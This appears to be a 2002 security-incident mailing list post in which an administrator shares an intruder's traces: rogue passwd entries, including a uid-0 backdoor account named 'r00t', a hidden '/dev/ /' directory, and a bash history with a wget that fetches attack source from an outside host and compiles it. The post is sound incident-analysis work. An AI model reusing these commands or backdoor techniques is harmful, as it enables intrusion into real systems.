Security Incidents mailing list archives

watching them -after the fact


From: Alvin Oga <alvin.sec () Mail Linux-Consulting com>
Date: Sun, 24 Mar 2002 23:11:37 -0800 (PST)


hi ya

this machine does NOT have su, wget, gcc installed
so they couldn't do much ???

they also created an empty dir:  "/dev/ /"
        ( yes... a space as its filename )

c ya
alvin


cat /etc/passwd
        ...

-->>        karlin::1001:1001::/tmp:/bin/bash
-->>        r00t::0:0::/tmp:/bin/bash


cat /tmp/.bash_history
...
su r00t
su r00t
sudo
suidperl 
uname -a
w
uname -a
exit
su r00t
uname -a
w
exit
w
su r00t
exit
w
su r00t
exit
wget turma85.hypermart.net/slice.c
gcc -o sl slice.c 
exit
su r00t
w
exit
#
# end of history


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

